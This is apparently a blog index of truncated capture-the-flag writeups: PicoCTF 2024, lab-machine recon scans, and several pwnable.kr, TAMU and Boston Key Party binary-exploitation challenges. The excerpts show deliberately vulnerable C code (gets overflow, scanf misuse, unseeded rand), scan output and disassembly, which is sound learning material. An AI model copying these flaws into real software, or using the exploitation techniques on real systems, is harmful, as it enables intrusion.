because this writeup is for my remind, it is very rough and might be incorrect especially “high frequency troubles”. 4/27 PicoCTF 2024 High Frequency Troubles #include <stdio.h> #include <stdlib.h> #include <stdint.h> enum { PKT_OPT_PING, PKT_OPT_ECHO, PKT_OPT_TRADE, } typedef pkt_opt_t; enum { PKT_MSG_INFO, PKT_MSG_DATA, } typedef pkt_msg_t; struct { size_t sz; uint64_t data[]; } typedef pkt_t; const struct { char *header; char *color; } type_tbl[] = { [PKT_MSG_INFO] = {"PKT_INFO", "\x1b[1;34m"}, [PKT_MSG_DATA] = {"PKT_DATA", "\x1b[1;33m"}, }; void putl(pkt_msg_t type, char *msg) { printf("%s%s\x1b[m:[%s]\n", type_tbl[type]....

Recon PORT STATE SERVICE REASON VERSION 22/tcp open ssh syn-ack OpenSSH 5.9p1 Debian 5ubuntu1.10 (Ubuntu Linux; protocol 2.0) | ssh-hostkey: | 1024 96:4c:51:42:3c:ba:22:49:20:4d:3e:ec:90:cc:fd:0e (DSA) | ssh-dss AAAAB3NzaC1kc3MAAACBAIMeSqrDdAOhxf7P1IDtdRqun0pO9pmUi+474hX6LHkDgC9dzcvEGyMB/cuuCCjfXn6QDd1n16dSE2zeKKjYT9RVCXJqfYvz/ROm82p0JasEdg1z6QHTeAv70XX6cVQAjAMQoUUdF7WWKWjQuAknb4uowunpQ0yGvy72rbFkSTmlAAAAFQDwWVA5vTpfj5pUCUNFyvnhy3TdcQAAAIBFqVHk74mIT3PWKSpWcZvllKCGg5rGCCE5B3jRWEbRo8CPRkwyPdi/hSaoiQYhvCIkA2CWFuAeedsZE6zMFVFVSsHxeMe55aCQclfMH4iuUZWrg0y5QREuRbGFM6DATJJFkg+PXG/OsLsba/BP8UfcuPM+WGWKxjuaoJt6jeD8iQAAAIBg9rgf8NoRfGqzi+3ndUCo9/m+T18pn+ORbCKdFGq8Ecs4QLeaXPMRIpCol11n6va090EISDPetHcaMaMcYOsFqO841K0O90BV8DhyU4JYBjcpslT+A2X+ahj2QJVGqZJSlusNAQ9vplWxofFONa+IUSGl1UsGjY0QGsA5l5ohfQ== | 2048 46:bf:1f:cc:92:4f:1d:a0:42:b3:d2:16:a8:58:31:33 (RSA) | ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQDRkMHjbGnQ7uoYx7HPJoW9Up+q0NriI5g5xAs1+0gYBVtBqPxi86gPtXbMHGSrpTiX854nsOPWA8UgfBOSZ2TgWeFvmcnRfUKJG9GR8sdIUvhKxq6ZOtUePereKr0bvFwMSl8Qtmo+KcRWvuxKS64RgUem2TVIWqStLJoPxt8iDPPM7929EoovpooSjwPfqvEhRMtq+KKlqU6PrJD6HshGdjLjABYY1ljfKakgBfWic+Y0KWKa9qdeBF09S7WlaUBWJ5SutKlNSwcRBBVbL4ZFcHijdlXCvfVwSVMkiqY7x4V4McsNpIzHyysZUADy8A6tbfSgopaeR2UN4QRgM1dX | 256 e6:2b:25:19:cb:7e:54:cb:0a:b9:ac:16:98:c6:7d:a9 (ECDSA) |_ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBJ+pCNI5Xv8P96CmyDi/EIvyL0LVZY2xAUJcA0G9rFdLJnIhjvmYuxoCQDsYl+LEiKQee5RRw9d+lgH3Fm5O9XI= 80/tcp open http syn-ack Apache httpd 2.2.22 ((Ubuntu)) | http-methods: |_ Supported Methods: GET HEAD POST OPTIONS |_http-server-header: Apache/2.2.22 (Ubuntu) |_http-title: Site doesn't have a title (text/html). 443/tcp open ssl/http syn-ack Apache httpd 2....

作業時のメモを少し見せるように改善したもの。 recon rustscan -a 10.10.10.13 -- -sVC -T5 --min-rate 10000 -oA nmap/tcp PORT STATE SERVICE REASON VERSION 22/tcp open ssh syn-ack OpenSSH 7.2p2 Ubuntu 4ubuntu2.1 (Ubuntu Linux; protocol 2.0) | ssh-hostkey: | 2048 18:b9:73:82:6f:26:c7:78:8f:1b:39:88:d8:02:ce:e8 (RSA) | ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQCkOUbDfxsLPWvII72vC7hU4sfLkKVEqyHRpvPWV2+5s2S4kH0rS25C/R+pyGIKHF9LGWTqTChmTbcRJLZE4cJCCOEoIyoeXUZWMYJCqV8crflHiVG7Zx3wdUJ4yb54G6NlS4CQFwChHEH9xHlqsJhkpkYEnmKc+CvMzCbn6CZn9KayOuHPy5NEqTRIHObjIEhbrz2ho8+bKP43fJpWFEx0bAzFFGzU0fMEt8Mj5j71JEpSws4GEgMycq4lQMuw8g6Acf4AqvGC5zqpf2VRID0BDi3gdD1vvX2d67QzHJTPA5wgCk/KzoIAovEwGqjIvWnTzXLL8TilZI6/PV8wPHzn | 256 1a:e6:06:a6:05:0b:bb:41:92:b0:28:bf:7f:e5:96:3b (ECDSA) | ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBKWsTNMJT9n5sJr5U1iP8dcbkBrDMs4yp7RRAvuu10E6FmORRY/qrokZVNagS1SA9mC6eaxkgW6NBgBEggm3kfQ= | 256 1a:0e:e7:ba:00:cc:02:01:04:cd:a3:a9:3f:5e:22:20 (ED25519) |_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIHBIQsAL/XR/HGmUzGZgRJe/1lQvrFWnODXvxQ1Dc+Zx 53/tcp open domain syn-ack ISC BIND 9.10.3-P4 (Ubuntu Linux) | dns-nsid: |_ bind.version: 9.10.3-P4-Ubuntu 80/tcp open http syn-ack Apache httpd 2....

PicoCTF 2024に参加したのでWriteupを書きました。 解いた問題は以下の通り。 Binary Exploitation format string0 format string1 format string2 format string3 heap 0 heap 1 heap 2 heap 3 babygame03 high frequency troubles Cryptography interencdec custom encryption c3 rsa_oracle flag_printer Forensics scan surprise verify canyousee secret of the polyglot mob psycho endianness-v2 blast from the past dear diary General Skills super ssh commitment issues time machine blame game collaborative development binhexa binary search endianness dont-you-love-banners sansalpha Reverse Engineering packer factcheck winantidbg0x100 classic crackme 0x100 weirdsnake winantidbg0x200 winantidbg0x300 Web Exploitation bookmarklet webdecode introtoburp unminify no sql injection trickster elements 去年よりも成長していて嬉しい。...

Boston Key Part 2016 Simple Calc Arch: amd64-64-little RELRO: Partial RELRO Stack: No canary found NX: NX enabled PIE: No PIE (0x400000) This binary scans 2 inputs. First input will be number of calculation. Second input will be option of calculation. Results of each calculations is assigned to the heap space (heap address + current number of calculation * 4). If I chose to end the calculation, it copies the all data from the heap space in which the all of result of calculation is stored to the local variable....

Review of Stack BOF chapter in Nightmare. TAMU'19 Pwn1 Arch: i386-32-little RELRO: Full RELRO Stack: No canary found NX: NX enabled PIE: PIE enabled This binary scans 3 inputs and, first 2 inputs and some strings are compared. Last input is gotten by gets function which doesn’t have any limit of input, I can overwrite the local variable which and 0xdea110c8 are compared. import pwn import struct io = pwn.process("./pwn1") io....

Pwnable.krのpasscodeを解いたのでそのwriteupを書いた。 これが結構勉強になった。問題文は次の通り Mommy told me to make a passcode based login system. My initial C code was compiled without any error! Well, there was some compiler warning, but who cares about that? ssh [email protected] -p2222 (pw:guest) 任意のアドレスに任意の値を書き込める脆弱性 問題のプログラムのソースコードは以下になる。 passcode.c #include <stdio.h> #include <stdlib.h> void login(){ int passcode1; int passcode2; printf("enter passcode1 : "); scanf("%d", passcode1); fflush(stdin); // ha! mommy told me that 32bit is vulnerable to bruteforcing :) printf("enter passcode2 : "); scanf("%d", passcode2); printf("checking....

pwnable.krのrandomを解いたのでそのwriteupを書いた。 問題のソースコードは以下の通り #include <stdio.h> int main(){ unsigned int random; random = rand(); // random value! unsigned int key=0; scanf("%d", &key); if( (key ^ random) == 0xdeadbeef ){ printf("Good!\n"); system("/bin/cat flag"); return 0; } printf("Wrong, maybe you should try 2^32 cases.\n"); return 0; } Glibcのrand関数は、srand関数を使ってシード値を生成してから呼ぶことで疑似乱数を得ることができる。 次にsrandを呼ぶまではrand関数から得られる値は同じになる。 そして、srandを一度もよばないでrandを使う場合はデフォルトのシード値が使われる。 今回の問題ではrand関数のみを使っているので、randomの値はいつ実行しても同じになる。 したがって、実行中にrandomの値をみて、その値とxorして0xdeadbeefになる値を入力すればフラグがゲットできそう。 pwndbg> disass main Dump of assembler code for function main: 0x00000000004005f4 <+0>: push rbp 0x00000000004005f5 <+1>: mov rbp,rsp 0x00000000004005f8 <+4>: sub rsp,0x10 0x00000000004005fc <+8>: mov eax,0x0 0x0000000000400601 <+13>: call 0x400500 <rand@plt> 0x0000000000400606 <+18>: mov DWORD PTR [rbp-0x4],eax 0x0000000000400609 <+21>: mov DWORD PTR [rbp-0x8],0x0 0x0000000000400610 <+28>: mov eax,0x400760 0x0000000000400615 <+33>: lea rdx,[rbp-0x8] 0x0000000000400619 <+37>: mov rsi,rdx 0x000000000040061c <+40>: mov rdi,rax 0x000000000040061f <+43>: mov eax,0x0 0x0000000000400624 <+48>: call 0x4004f0 <__isoc99_scanf@plt> 0x0000000000400629 <+53>: mov eax,DWORD PTR [rbp-0x8] 0x000000000040062c <+56>: xor eax,DWORD PTR [rbp-0x4] 0x000000000040062f <+59>: cmp eax,0xdeadbeef 0x0000000000400634 <+64>: jne 0x400656 <main+98> 0x0000000000400636 <+66>: mov edi,0x400763 0x000000000040063b <+71>: call 0x4004c0 <puts@plt> 0x0000000000400640 <+76>: mov edi,0x400769 0x0000000000400645 <+81>: mov eax,0x0 0x000000000040064a <+86>: call 0x4004d0 <system@plt> 0x000000000040064f <+91>: mov eax,0x0 0x0000000000400654 <+96>: jmp 0x400665 <main+113> 0x0000000000400656 <+98>: mov edi,0x400778 0x000000000040065b <+103>: call 0x4004c0 <puts@plt> 0x0000000000400660 <+108>: mov eax,0x0 0x0000000000400665 <+113>: leave 0x0000000000400666 <+114>: ret End of assembler dump....

Pwnable.krのbofを解いたのでそのwriteupを書いた。 問題文は以下の通り。 Nana told me that buffer overflow is one of the most common software vulnerability. Is that true? Download : http://pwnable.kr/bin/bof Download : http://pwnable.kr/bin/bof.c Running at : nc pwnable.kr 9000 名前からしてバッファオーバーフローの脆弱性を利用したものですね。 $ wget http://pwnable.kr/bin/bof $ wget http://pwnable.kr/bin/bof.c ソースコードは以下の通り #include <stdio.h> #include <string.h> #include <stdlib.h> void func(int key){ char overflowme[32]; printf("overflow me : "); gets(overflowme); // smash me! if(key == 0xcafebabe){ system("/bin/sh"); } else{ printf("Nah..\n"); } } int main(int argc, char* argv[]){ func(0xdeadbeef); return 0; } from gets/wikipedia gets は、C言語における標準入力から1行分の文字列を取り出す関数である。この関数はバッファオーバーランを防ぐことが不可能という致命的な脆弱性を持っており、 2011年に改訂されたC11規格以降の標準Cライブラリでは廃止された[1]。...